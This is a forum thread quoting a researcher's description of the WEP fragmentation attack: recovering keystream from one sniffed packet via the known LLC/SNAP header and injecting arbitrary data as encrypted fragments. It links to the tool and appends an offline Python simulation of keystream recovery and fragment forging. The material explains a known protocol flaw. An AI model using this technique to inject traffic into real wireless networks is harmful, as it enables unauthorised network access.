Quote:
|
Originally Posted by sorbo
It is possible to send arbitrary data [any length and content] on a WEP network after having eavesdropped a single data packet.
http://darkircop.org/frag-0.1.tgz
The idea is:
Sniff first 8 bytes of cipher-text on packet with IV X.
XOR cipher-text with 8 bytes of clear-text:
AA AA 03 00 00 00 08 {00/06} depending if IP/ARP.
Send data in 802.11 fragments of 4 data bytes + 4 CRC32 bytes all encrypted using the PRGA recovered and with IV X.
|
Great work sorbo, lotsa information presented in a well-written research paper.
And damn you too - I want to play with this, but have too little time for new projects.
Could somebody please invent a TimeAddingMachine. Just 1 additional hour a day would be helpful.
Dutch
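
An offline simulation of the keystream recovery described in the quoted post, added here as an example (it is not code from frag-0.1 or from either poster). The key, IV, payloads and all function names are constructed for illustration; it shows why a receiver that accepts a reused IV will validate fragments built from 8 recovered keystream bytes.

```python
import zlib

# Known first 8 plaintext bytes (LLC/SNAP header, IP variant) as given in the post.
SNAP_IP = bytes.fromhex("aaaa030000000800")

def rc4(key, n):
    """Return n bytes of RC4 keystream for key."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def icv(data):
    """WEP integrity value: CRC32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")

def wep_encrypt(iv, key, payload):
    body = payload + icv(payload)
    return xor(body, rc4(iv + key, len(body)))

def wep_decrypt(iv, key, ct):
    """Receiver side: decrypt, return data only if the ICV checks out."""
    body = xor(ct, rc4(iv + key, len(ct)))
    return body[:-4] if icv(body[:-4]) == body[-4:] else None

def recover_keystream(ct, known=SNAP_IP):
    """Ciphertext XOR known plaintext = keystream for that IV."""
    return xor(ct[:len(known)], known)

def make_fragments(ks, message):
    """Split into 4 data bytes + 4 ICV bytes, each under the same 8 keystream bytes."""
    chunks = [message[o:o + 4] for o in range(0, len(message), 4)]
    return [xor(c + icv(c), ks) for c in chunks]

def demo():
    iv, key = bytes.fromhex("010203"), bytes.fromhex("0badc0ffee")  # constructed
    sniffed = wep_encrypt(iv, key, SNAP_IP + b"constructed payload")
    ks = recover_keystream(sniffed)  # no knowledge of key needed here
    return [wep_decrypt(iv, key, f) for f in make_fragments(ks, b"arbitrary data!!")]
```

Every fragment passes the receiver's ICV check because WEP ties the keystream only to the IV and key and has no replay protection on the IV.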